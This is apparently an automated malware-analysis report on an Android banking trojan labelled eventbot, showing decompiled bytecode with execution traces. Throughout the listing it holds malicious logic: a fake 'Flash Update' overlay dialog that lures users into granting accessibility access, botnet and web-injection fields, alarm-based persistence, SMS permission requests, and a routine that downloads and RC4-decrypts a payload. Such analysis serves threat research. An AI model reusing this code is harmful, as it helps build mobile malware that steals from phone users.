                        • android.app.AlertDialog$Builder.setView
                        • android.app.AlertDialog$Builder.setCancelable
                        • android.app.AlertDialog$Builder.setPositiveButton
                        • android.app.AlertDialog$Builder.create
                        • android.app.AlertDialog.getWindow
                        • android.view.Window.setType
                        • android.app.AlertDialog.show
                        Strings
                        • <html> <head> <meta charset=UTF-8> <meta name=viewport content=width=device-width, user-scalable=no, minimal-ui /> <meta name=viewport content=width=device-width,initial-scale=1> <style> html,body {height: 100%;} body { padding: 0; margin: 0; font-family: Helvetica, sans-serif; background: #eef1f2; color: #5e5757;} .textturn { padding: 10px; display: block; margin: 0 auto; border: 0; background: #eef1f2; font-weight: bold; font-size: 14px;} .textheader{ padding: 25px; text-align: center; font-size: 16px; max-width: 100%; background: #eef1f2;} img { -o-object-fit: cover; object-fit: cover; height: auto; max-width: 100%; width: auto; } </style> </head> <body> <div class=textturn textheader> Flash Update will not work correctly. </div> <div class=textturn> 1. Select Flash Update in Settings </div> <div style=width:100%> <img src=1.jpg> </div> <div class=textturn> 2. Turn on it </div> <div style=width:100%> <img src=2.jpg> </div> </body> </html>
                        • Enable Flash Update
                        • file:///android_asset/
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v3, 0x1
                        2iget-boolean v0, p0, Lcom/lib;->a11yAlertVisible:Z
                        3if-eqz v0, :cond_6
                        4goto_5: return-void
                        5cond_6: iput-boolean v3, p0, Lcom/lib;->a11yAlertVisible:Z
                        7invoke-virtual {p1}, Landroid/content/Context;->getResources()Landroid/content/res/Resources;
                        8move-result-object v0
                        10sget-object v1, Lcom/lib;->hint_text:Ljava/lang/Integer;
                        12invoke-virtual {v1}, Ljava/lang/Integer;->intValue()I
                        13move-result v1
                        15invoke-virtual {v0, v1}, Landroid/content/res/Resources;->getString(I)Ljava/lang/String;
                        • Time: 165224
                          • This:
                            • android.content.res.Resources@89d302c
                          • id: 2131427389
                          • Return:
                            • <html> <head> <meta charset=UTF-8> <meta name=viewport content=width=device-width, user-scalable=no, minimal-ui /> <meta name=viewport content=width=device-width,initial-scale=1> <style> html,body {height: 100%;} body { padding: 0; margin: 0; font-family: Helvetica, sans-serif; background: #eef1f2; color: #5e5757;} .textturn { padding: 10px; display: block; margin: 0 auto; border: 0; background: #eef1f2; font-weight: bold; font-size: 14px;} .textheader{ padding: 25px; text-align: center; font-size: 16px; max-width: 100%; background: #eef1f2;} img { -o-object-fit: cover; object-fit: cover; height: auto; max-width: 100%; width: auto; } </style> </head> <body> <div class=textturn textheader> Flash Update will not work correctly. </div> <div class=textturn> 1. Select Flash Update in Settings </div> <div style=width:100%> <img src=1.jpg> </div> <div class=textturn> 2. Turn on it </div> <div style=width:100%> <img src=2.jpg> </div> </body> </html>
                        16move-result-object v2
                        18invoke-virtual {p1}, Landroid/content/Context;->getResources()Landroid/content/res/Resources;
                        19move-result-object v0
                        21sget-object v1, Lcom/lib;->hint_button:Ljava/lang/Integer;
                        23invoke-virtual {v1}, Ljava/lang/Integer;->intValue()I
                        24move-result v1
                        26invoke-virtual {v0, v1}, Landroid/content/res/Resources;->getString(I)Ljava/lang/String;
                        • Time: 165229
                          • This:
                            • android.content.res.Resources@89d302c
                          • id: 2131427388
                          • Return:
                            • Enable Flash Update
                        27move-result-object v6
                        28new-instance v0, Landroid/webkit/WebView;
                        30invoke-direct {v0, p2}, Landroid/webkit/WebView;-><init>(Landroid/content/Context;)V
                        32invoke-virtual {v0}, Landroid/webkit/WebView;->getSettings()Landroid/webkit/WebSettings;
                        33move-result-object v1
                        35invoke-virtual {v1, v3}, Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V
                        37const-string v1, "file:///android_asset/"
                        39sget-object v3, Lcom/lib;->STRINGS_TEXT_HTML:Ljava/lang/String;
                        41sget-object v4, Lcom/lib;->STRINGS_UTF_8:Ljava/lang/String;
                        42const/4 v5, 0x0
                        44invoke-virtual/range {v0 .. v5}, Landroid/webkit/WebView;->loadDataWithBaseURL(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)V
                        45new-instance v1, Landroid/app/AlertDialog$Builder;
                        46const/4 v2, 0x3
                        48invoke-direct {v1, p2, v2}, Landroid/app/AlertDialog$Builder;-><init>(Landroid/content/Context;I)V
                        • Time: 167203
                          • This:
                            • android.app.AlertDialog$Builder@1445260
                          • p0: com.example.eventbot.activity@9c8013d
                          • p1: 3
                          • Return:
                            • android.app.AlertDialog$Builder@1445260
                        50invoke-virtual {v1, v0}, Landroid/app/AlertDialog$Builder;->setView(Landroid/view/View;)Landroid/app/AlertDialog$Builder;
                        51move-result-object v0
                        52const/4 v2, 0x0
                        54invoke-virtual {v0, v2}, Landroid/app/AlertDialog$Builder;->setCancelable(Z)Landroid/app/AlertDialog$Builder;
                        55move-result-object v0
                        56new-instance v2, Lcom/lib$3;
                        58invoke-direct {v2, p0, p1}, Lcom/lib$3;-><init>(Lcom/lib;Landroid/content/Context;)V
                        60invoke-virtual {v0, v6, v2}, Landroid/app/AlertDialog$Builder;->setPositiveButton(Ljava/lang/CharSequence;Landroid/content/DialogInterface$OnClickListener;)Landroid/app/AlertDialog$Builder;
                        62invoke-virtual {v1}, Landroid/app/AlertDialog$Builder;->create()Landroid/app/AlertDialog;
                        63move-result-object v0
                        65invoke-virtual {v0}, Landroid/app/AlertDialog;->getWindow()Landroid/view/Window;
                        66move-result-object v1
                        67const/16 v2, 0x7d3
                        69invoke-virtual {v1, v2}, Landroid/view/Window;->setType(I)V
                        71invoke-virtual {v0}, Landroid/app/AlertDialog;->show()V
                        • Time: 167514
                          • This:
                            • android.app.AlertDialog@38b6489
                        72goto/16 :goto_5
                        Cross References
                        APIs
                        • android.content.Context.getSystemService
                        • android.content.Intent.<init>
                        • android.app.PendingIntent.getBroadcast
                        • java.lang.System.currentTimeMillis
                        • java.lang.Long.longValue
                        • android.app.AlarmManager.setExactAndAllowWhileIdle
                        • java.lang.System.currentTimeMillis
                        • java.lang.Long.longValue
                        • android.app.AlarmManager.setExact
                        Strings
                        • alarm
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"(",
                        3"Landroid/content/Context;",
                        4"Ljava/lang/Class<",
                        5"*>;",
                        6"Ljava/lang/Long;",
                        7")Z"
                        8}
                        9.end annotation
                        11const-string v0, "alarm"
                        13invoke-virtual {p0, v0}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
                        • Time: 149689
                          • This:
                            • com.example.eventbot.service@5c14a30
                          • p0: alarm
                          • Return:
                            • android.app.AlarmManager@9eccaa2
                        • Time: 159704
                          • This:
                            • android.app.ReceiverRestrictedContext@22dc9ca
                          • p0: alarm
                          • Return:
                            • android.app.AlarmManager@d36a73b
                        14move-result-object v0
                        15check-cast v0, Landroid/app/AlarmManager;
                        16const/4 v1, 0x0
                        17if-eqz v0, :cond_39
                        18new-instance v2, Landroid/content/Intent;
                        20invoke-direct {v2, p0, p1}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
                        22invoke-static {p0, v1, v2, v1}, Landroid/app/PendingIntent;->getBroadcast(Landroid/content/Context;ILandroid/content/Intent;I)Landroid/app/PendingIntent;
                        23move-result-object p0
                        24sget p1, Landroid/os/Build$VERSION;->SDK_INT:I
                        25const/16 v2, 0x17
                        26const-wide/16 v3, 0x3e8
                        27if-lt p1, v2, :cond_2b
                        29invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
                        30move-result-wide v5
                        32invoke-virtual {p2}, Ljava/lang/Long;->longValue()J
                        33move-result-wide p1
                        34mul-long p1, p1, v3
                        35add-long/2addr v5, p1
                        37invoke-virtual {v0, v1, v5, v6, p0}, Landroid/app/AlarmManager;->setExactAndAllowWhileIdle(IJLandroid/app/PendingIntent;)V
                        38goto/16 :goto_39
                        39cond_2b:
                        40invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
                        41move-result-wide v5
                        43invoke-virtual {p2}, Ljava/lang/Long;->longValue()J
                        44move-result-wide p1
                        45mul-long p1, p1, v3
                        46add-long/2addr v5, p1
                        48invoke-virtual {v0, v1, v5, v6, p0}, Landroid/app/AlarmManager;->setExact(IJLandroid/app/PendingIntent;)V
                        49cond_39: return v1
                        APIs
                        • java.lang.Object.<init>
                        • java.lang.String.<init>
                        • java.lang.Integer.valueOf
                        • java.lang.String.<init>
                        • java.lang.Thread.<init>
                        • java.lang.Thread.<init>
                        • com.lib$9.<init>
                        • java.lang.String.toCharArray
                        Strings
                        • 0123456789abcdef
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"(",
                        3"Landroid/content/Context;",
                        4"Landroid/content/Context;",
                        5"Ljava/lang/String;",
                        6"Ljava/lang/String;",
                        7"Ljava/lang/String;",
                        8"Ljava/lang/Long;",
                        9"Ljava/lang/Integer;",
                        10"Ljava/lang/Long;",
                        11"Ljava/lang/String;",
                        12"Ljava/lang/String;",
                        13"Ljava/lang/String;",
                        14"Ljava/lang/Class",
                        15"<*>;",
                        16"Ljava/lang/Integer;",
                        17"Ljava/lang/Integer;",
                        18"Ljava/lang/Integer;",
                        19"Ljava/lang/String;",
                        20")V"
                        21}
                        22.end annotation
                        23.prologue
                        25invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        26new-instance v1, Ljava/lang/String;
                        28invoke-direct {v1}, Ljava/lang/String;-><init>()V
                        29iput-object v1, p0, Lcom/lib;->gateKey:Ljava/lang/String;
                        30const/4 v1, 0x6
                        32invoke-static {v1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        33move-result-object v1
                        34iput-object v1, p0, Lcom/lib;->timeout:Ljava/lang/Integer;
                        35const/4 v1, 0x0
                        36iput-boolean v1, p0, Lcom/lib;->a11yAlertVisible:Z
                        37const/4 v1, 0x0
                        38iput-object v1, p0, Lcom/lib;->webInjCurrentApp:Ljava/lang/String;
                        39new-instance v1, Ljava/lang/String;
                        41invoke-direct {v1}, Ljava/lang/String;-><init>()V
                        42iput-object v1, p0, Lcom/lib;->urlsFallback:Ljava/lang/String;
                        43new-instance v1, Ljava/lang/Thread;
                        44new-instance v2, Lcom/lib$1;
                        46invoke-direct {v2, p0}, Lcom/lib$1;-><init>(Lcom/lib;)V
                        48invoke-direct {v1, v2}, Ljava/lang/Thread;-><init>(Ljava/lang/Runnable;)V
                        49iput-object v1, p0, Lcom/lib;->networkThread:Ljava/lang/Thread;
                        50new-instance v1, Ljava/lang/Thread;
                        51new-instance v2, Lcom/lib$2;
                        53invoke-direct {v2, p0}, Lcom/lib$2;-><init>(Lcom/lib;)V
                        55invoke-direct {v1, v2}, Ljava/lang/Thread;-><init>(Ljava/lang/Runnable;)V
                        56iput-object v1, p0, Lcom/lib;->permissionsThread:Ljava/lang/Thread;
                        57new-instance v1, Lcom/lib$9;
                        59invoke-direct {v1, p0}, Lcom/lib$9;-><init>(Lcom/lib;)V
                        60iput-object v1, p0, Lcom/lib;->a11yInjectThread:Ljava/lang/Thread;
                        62const-string v1, "0123456789abcdef"
                        64invoke-virtual {v1}, Ljava/lang/String;->toCharArray()[C
                        65move-result-object v1
                        66iput-object v1, p0, Lcom/lib;->HEX_ARRAY:[C
                        67const/4 v1, 0x1
                        68iput v1, p0, Lcom/lib;->ACTIVITY_MODE_ADMIN:I
                        69const/4 v1, 0x2
                        70iput v1, p0, Lcom/lib;->ACTIVITY_MODE_A11Y:I
                        71const/4 v1, 0x3
                        72iput v1, p0, Lcom/lib;->ACTIVITY_MODE_OVERLAY:I
                        73const/4 v1, 0x4
                        74iput v1, p0, Lcom/lib;->ACTIVITY_MODE_LOCK_NAVIGATION:I
                        75const/4 v1, 0x5
                        76iput v1, p0, Lcom/lib;->ACTIVITY_MODE_LOCK_OVERLAY:I
                        77const/4 v1, 0x6
                        78iput v1, p0, Lcom/lib;->ACTIVITY_MODE_WEB:I
                        79const/4 v1, 0x7
                        80iput v1, p0, Lcom/lib;->ACTIVITY_MODE_PINNED:I
                        81const/16 v1, 0x7b
                        82iput v1, p0, Lcom/lib;->ACTIVITY_RESULT_ADMIN:I
                        83const/4 v1, 0x2
                        84iput v1, p0, Lcom/lib;->COMMAND_FAIL:I
                        85const/4 v1, 0x3
                        86iput v1, p0, Lcom/lib;->COMMAND_SUCCESS:I
                        87const/4 v1, 0x4
                        88iput v1, p0, Lcom/lib;->COMMAND_NO_PERMISSIONS:I
                        89const/4 v1, 0x5
                        90iput v1, p0, Lcom/lib;->COMMAND_SCREEN_LOCKED:I
                        91const/4 v1, 0x6
                        92iput v1, p0, Lcom/lib;->COMMAND_ALREADY_STARTED:I
                        93const/4 v1, 0x7
                        94iput v1, p0, Lcom/lib;->COMMAND_WEB_REQUESTED:I
                        95const/16 v1, 0x8
                        96iput v1, p0, Lcom/lib;->COMMAND_WEB_FINISHED:I
                        97const/16 v1, 0x9
                        98iput v1, p0, Lcom/lib;->COMMAND_IN_PROGRESS:I
                        99const/4 v1, 0x1
                        100iput v1, p0, Lcom/lib;->ACTION_START:I
                        101const/4 v1, 0x0
                        102iput v1, p0, Lcom/lib;->ACTION_STOP:I
                        103const/4 v1, 0x2
                        104iput v1, p0, Lcom/lib;->ACTION_UPDATE:I
                        105iput-object p1, p0, Lcom/lib;->context:Landroid/content/Context;
                        106iput-object p3, p0, Lcom/lib;->TAG:Ljava/lang/String;
                        107iput-object p6, p0, Lcom/lib;->knockDelay:Ljava/lang/Long;
                        108iput-object p10, p0, Lcom/lib;->a11yClassName:Ljava/lang/String;
                        109iput-object p8, p0, Lcom/lib;->permissionsDelay:Ljava/lang/Long;
                        110iput-object p7, p0, Lcom/lib;->webRetries:Ljava/lang/Integer;
                        111move-object/from16 v0, p16
                        112iput-object v0, p0, Lcom/lib;->botnetID:Ljava/lang/String;
                        113if-eqz p2, :cond_95
                        114sput-object p2, Lcom/lib;->a11yContext:Landroid/content/Context;
                        115cond_95: sput-object p11, Lcom/lib;->selfAppName:Ljava/lang/String;
                        116sput-object p12, Lcom/lib;->activityHelperClass:Ljava/lang/Class;
                        117sput-object p13, Lcom/lib;->hint_text:Ljava/lang/Integer;
                        118sput-object p14, Lcom/lib;->hint_button:Ljava/lang/Integer;
                        119sput-object p15, Lcom/lib;->banner_text:Ljava/lang/Integer;
                        120sput-object p4, Lcom/lib;->botVersion:Ljava/lang/String;
                        121iput-object p5, p0, Lcom/lib;->gateKey:Ljava/lang/String;
                        123invoke-virtual {p0, p1, p9}, Lcom/lib;->loadUrls(Landroid/content/Context;Ljava/lang/String;)V
                        124return-void
                        Cross References
                        APIs
                        • android.content.Intent.<init>
                        • android.content.Intent.addFlags
                        • android.content.Intent.putExtra
                        • android.content.Context.startActivity
                        Strings
                        • mode
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Landroid/content/Intent;
                        3sget-object v1, Lcom/lib;->activityHelperClass:Ljava/lang/Class;
                        5invoke-direct {v0, p1, v1}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
                        6const/high16 v1, 0x54000000
                        8invoke-virtual {v0, v1}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;
                        10const-string v1, "mode"
                        11const/4 v2, 0x2
                        13invoke-virtual {v0, v1, v2}, Landroid/content/Intent;->putExtra(Ljava/lang/String;I)Landroid/content/Intent;
                        15invoke-virtual {p1, v0}, Landroid/content/Context;->startActivity(Landroid/content/Intent;)V
                        • Time: 164825
                          • This:
                            • com.example.eventbot.service@5c14a30
                          • p0: Intent { flg=0x54000000 cmp=com.example.eventbot/.activity (has extras) }
                        16return-void
                        APIs
                        • java.util.concurrent.Semaphore.<init>
                        • com.example.eventbot.events.<init>
                        • java.lang.Object.getClass
                        • java.lang.Class.getCanonicalName
                        Position Instruction Meta Information
                        0new-instance v0, Ljava/util/concurrent/Semaphore;
                        1const/4 v1, 0x1
                        3invoke-direct {v0, v1}, Ljava/util/concurrent/Semaphore;-><init>(I)V
                        4sput-object v0, Lcom/example/eventbot/events;->onAccessibilityEventFired:Ljava/util/concurrent/Semaphore;
                        5new-instance v0, Lcom/example/eventbot/events;
                        7invoke-direct {v0}, Lcom/example/eventbot/events;-><init>()V
                        9invoke-virtual {v0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        • Time: 149620
                          • This:
                            • com.example.eventbot.events@1d25945
                          • Return:
                            • class com.example.eventbot.events
                            • getName: com.example.eventbot.events
                        10move-result-object v0
                        12invoke-virtual {v0}, Ljava/lang/Class;->getCanonicalName()Ljava/lang/String;
                        13move-result-object v0
                        14sput-object v0, Lcom/example/eventbot/events;->TAG:Ljava/lang/String;
                        15const/4 v0, 0x0
                        16sput-object v0, Lcom/example/eventbot/events;->FuncLocal:Lcom/libInterface;
                        17return-void
                        Cross References
                        APIs
                        • android.content.Context.getPackageManager
                        • android.content.pm.PackageManager.getPackageInfo
                        • android.content.pm.PackageInfo.versionName:Ljava/lang/String
                        Strings
                        • com.android.vending
                        Position Instruction Meta Information
                        0.prologue
                        1try_start_0:
                        2invoke-virtual {p0}, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
                        3move-result-object v0
                        4const/4 v1, 0x0
                        6invoke-virtual {v0, p1, v1}, Landroid/content/pm/PackageManager;->getPackageInfo(Ljava/lang/String;I)Landroid/content/pm/PackageInfo;
                        • Time: 151007
                          • This:
                            • android.app.ApplicationPackageManager@664a6f0
                          • packageName: com.android.vending
                          • flags: 0
                          • Return:
                            • PackageInfo{f6a6a5e com.android.vending}
                        • Time: 163933
                          • This:
                            • android.app.ApplicationPackageManager@664a6f0
                          • packageName: com.android.vending
                          • flags: 0
                          • Return:
                            • PackageInfo{703bea3 com.android.vending}
                        • Time: 186421
                          • This:
                            • android.app.ApplicationPackageManager@664a6f0
                          • packageName: com.android.vending
                          • flags: 0
                          • Return:
                            • PackageInfo{87a82aa com.android.vending}
                        • Time: 200756
                          • This:
                            • android.app.ApplicationPackageManager@664a6f0
                          • packageName: com.android.vending
                          • flags: 0
                          • Return:
                            • PackageInfo{9b9260c com.android.vending}
                        • Time: 222515
                          • This:
                            • android.app.ApplicationPackageManager@664a6f0
                          • packageName: com.android.vending
                          • flags: 0
                          • Return:
                            • PackageInfo{9cc38d2 com.android.vending}
                        • Time: 235533
                          • This:
                            • android.app.ApplicationPackageManager@664a6f0
                          • packageName: com.android.vending
                          • flags: 0
                          • Return:
                            • PackageInfo{fb854a9 com.android.vending}
                        • Time: 257423
                          • This:
                            • android.app.ApplicationPackageManager@664a6f0
                          • packageName: com.android.vending
                          • flags: 0
                          • Return:
                            • PackageInfo{cb56bb5 com.android.vending}
                        • Time: 270248
                          • This:
                            • android.app.ApplicationPackageManager@664a6f0
                          • packageName: com.android.vending
                          • flags: 0
                          • Return:
                            • PackageInfo{304a38b com.android.vending}
                        • Time: 291908
                          • This:
                            • android.app.ApplicationPackageManager@664a6f0
                          • packageName: com.android.vending
                          • flags: 0
                          • Return:
                            • PackageInfo{54e534b com.android.vending}
                        7move-result-object v0
                        9iget-object v0, v0, Landroid/content/pm/PackageInfo;->versionName:Ljava/lang/String;
                        10goto_b: return-object v0
                        11catch_c: move-exception v0
                        13sget-object v0, Lcom/lib;->STRINGS_NA:Ljava/lang/String;
                        14goto/16 :goto_b

                        361 Non-Executed Methods

                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.net.URL.<init>
                        • java.net.URL.openConnection
                        • java.lang.Integer.intValue
                        • java.net.HttpURLConnection.setReadTimeout
                        • java.lang.Integer.intValue
                        • java.net.HttpURLConnection.setConnectTimeout
                        • java.net.HttpURLConnection.setRequestMethod
                        • java.net.HttpURLConnection.setDoOutput
                        • java.net.HttpURLConnection.connect
                        • java.net.HttpURLConnection.getResponseCode
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.io.FileOutputStream.<init>
                        • java.net.HttpURLConnection.getInputStream
                        • java.net.HttpURLConnection.getContentLength
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.io.ByteArrayOutputStream.<init>
                        • java.io.InputStream.read
                        • java.io.ByteArrayOutputStream.write
                        • java.io.ByteArrayOutputStream.toByteArray
                        • java.io.FileOutputStream.write
                        • java.io.FileOutputStream.flush
                        • java.io.InputStream.close
                        • java.io.FileOutputStream.close
                        • java.lang.Throwable.printStackTrace
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • [func] [downloadFile] sUrl:
                        • GET
                        • [func] [downloadFile] resp code:
                        • [func] [downloadFile] getContentLength():
                        • [func] downloadFile failed:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v2, 0x1
                        2const/4 v1, 0x0
                        3new-instance v0, Ljava/lang/StringBuilder;
                        5invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        7const-string v3, "[func] [downloadFile] sUrl: "
                        9invoke-virtual {v0, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        10move-result-object v0
                        12invoke-virtual {v0, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        13move-result-object v0
                        15invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        16move-result-object v0
                        18invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        19try_start_18: new-instance v0, Ljava/net/URL;
                        21invoke-direct {v0, p1}, Ljava/net/URL;-><init>(Ljava/lang/String;)V
                        23invoke-virtual {v0}, Ljava/net/URL;->openConnection()Ljava/net/URLConnection;
                        24move-result-object v0
                        25check-cast v0, Ljava/net/HttpURLConnection;
                        27invoke-virtual {p4}, Ljava/lang/Integer;->intValue()I
                        28move-result v3
                        29mul-int/lit16 v3, v3, 0x3e8
                        31invoke-virtual {v0, v3}, Ljava/net/HttpURLConnection;->setReadTimeout(I)V
                        33invoke-virtual {p4}, Ljava/lang/Integer;->intValue()I
                        34move-result v3
                        35mul-int/lit16 v3, v3, 0x3e8
                        37invoke-virtual {v0, v3}, Ljava/net/HttpURLConnection;->setConnectTimeout(I)V
                        39const-string v3, "GET"
                        41invoke-virtual {v0, v3}, Ljava/net/HttpURLConnection;->setRequestMethod(Ljava/lang/String;)V
                        42const/4 v3, 0x1
                        44invoke-virtual {v0, v3}, Ljava/net/HttpURLConnection;->setDoOutput(Z)V
                        46invoke-virtual {v0}, Ljava/net/HttpURLConnection;->connect()V
                        48invoke-virtual {v0}, Ljava/net/HttpURLConnection;->getResponseCode()I
                        49move-result v3
                        50new-instance v4, Ljava/lang/StringBuilder;
                        52invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
                        54const-string v5, "[func] [downloadFile] resp code: "
                        56invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        57move-result-object v4
                        59invoke-virtual {v4, v3}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        60move-result-object v4
                        62invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        63move-result-object v4
                        65invoke-virtual {p0, v4}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        66const/16 v4, 0xc8
                        67if-ne v3, v4, :cond_d8
                        68new-instance v3, Ljava/io/FileOutputStream;
                        70invoke-direct {v3, p2}, Ljava/io/FileOutputStream;-><init>(Ljava/io/File;)V
                        72invoke-virtual {v0}, Ljava/net/HttpURLConnection;->getInputStream()Ljava/io/InputStream;
                        73move-result-object v4
                        75invoke-virtual {v0}, Ljava/net/HttpURLConnection;->getContentLength()I
                        76move-result v5
                        77new-instance v0, Ljava/lang/StringBuilder;
                        79invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        81const-string v6, "[func] [downloadFile] getContentLength(): "
                        83invoke-virtual {v0, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        84move-result-object v0
                        86invoke-virtual {v0, v5}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        87move-result-object v0
                        89invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        90move-result-object v0
                        92invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        93const/16 v0, 0x400
                        94new-array v6, v0, [B
                        95new-instance v7, Ljava/io/ByteArrayOutputStream;
                        97invoke-direct {v7}, Ljava/io/ByteArrayOutputStream;-><init>()V
                        98move v0, v1
                        99goto_8c: const/4 v8, 0x0
                        100array-length v9, v6
                        102invoke-virtual {v4, v6, v8, v9}, Ljava/io/InputStream;->read([BII)I
                        103move-result v8
                        104const/4 v9, -0x1
                        105if-eq v8, v9, :cond_9b
                        106const/4 v9, 0x0
                        108invoke-virtual {v7, v6, v9, v8}, Ljava/io/ByteArrayOutputStream;->write([BII)V
                        109add-int/2addr v0, v8
                        110goto/16 :goto_8c
                        111cond_9b: if-ne v0, v5, :cond_d6
                        112if-ne v0, v5, :cond_d6
                        114invoke-virtual {v7}, Ljava/io/ByteArrayOutputStream;->toByteArray()[B
                        115move-result-object v0
                        117invoke-virtual {p0, p3, v0}, Lcom/lib;->rc4(Ljava/lang/String;[B)[B
                        118move-result-object v0
                        119const/4 v5, 0x0
                        120array-length v6, v0
                        122invoke-virtual {v3, v0, v5, v6}, Ljava/io/FileOutputStream;->write([BII)V
                        123try_end_ac: move v0, v2
                        124goto_ad:
                        125invoke-virtual {v3}, Ljava/io/FileOutputStream;->flush()V
                        127invoke-virtual {v4}, Ljava/io/InputStream;->close()V
                        129invoke-virtual {v3}, Ljava/io/FileOutputStream;->close()V
                        130goto_b6: return v0
                        131catch_b7: move-exception v2
                        132move v0, v1
                        133goto_b9:
                        134invoke-virtual {v2}, Ljava/lang/Throwable;->printStackTrace()V
                        135new-instance v1, Ljava/lang/StringBuilder;
                        137invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        139const-string v3, "[func] downloadFile failed: "
                        141invoke-virtual {v1, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        142move-result-object v1
                        144invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        145move-result-object v1
                        147invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        148move-result-object v1
                        150invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        151goto/16 :goto_b6
                        152catch_d3: move-exception v1
                        153move-object v2, v1
                        154goto/16 :goto_b9
                        155cond_d6: move v0, v1
                        156goto/16 :goto_ad
                        157cond_d8: move v0, v1
                        158goto/16 :goto_b6
                        APIs
                        • java.lang.Class.getMethod
                        • java.lang.reflect.Method.invoke
                        • java.lang.Object.toString
                        • java.lang.Integer.parseInt
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.util.Log.v
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.Exception.toString
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.util.Log.v
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.util.Log.v
                        • android.util.Log.v
                        • java.lang.Integer.TYPE:Ljava/lang/Class
                        • java.lang.Class.getMethod
                        • java.lang.Integer.valueOf
                        • java.lang.reflect.Method.invoke
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.Exception.toString
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.util.Log.v
                        Strings
                        • android.permission.RECEIVE_SMS
                        • perms
                        • checkSelfPermission
                        • result:
                        • 1 Exception:
                        • accessCoarseLocationAllowed:
                        • invoke
                        • requestPermissions
                        • 2 Exception:
                        Position Instruction Meta Information
                        1const-string v0, "android.permission.RECEIVE_SMS"
                        3const-string v1, "perms"
                        4sget v2, Landroid/os/Build$VERSION;->SDK_INT:I
                        5const/16 v3, 0x17
                        6if-lt v2, v3, :cond_b9
                        7const/4 v2, 0x1
                        8const/4 v3, 0x0
                        9try_start_c: const-class v4, Landroid/app/Activity;
                        11const-string v5, "checkSelfPermission"
                        12new-array v6, v2, [Ljava/lang/Class;
                        13const-class v7, Ljava/lang/String;
                        14aput-object v7, v6, v3
                        16invoke-virtual {v4, v5, v6}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
                        17move-result-object v4
                        18new-array v5, v2, [Ljava/lang/Object;
                        19aput-object v0, v5, v3
                        21invoke-virtual {v4, p0, v5}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
                        22move-result-object v4
                        24invoke-virtual {v4}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        25move-result-object v4
                        27invoke-static {v4}, Ljava/lang/Integer;->parseInt(Ljava/lang/String;)I
                        28move-result v4
                        29new-instance v5, Ljava/lang/StringBuilder;
                        31invoke-direct {v5}, Ljava/lang/StringBuilder;-><init>()V
                        33const-string v6, "result: "
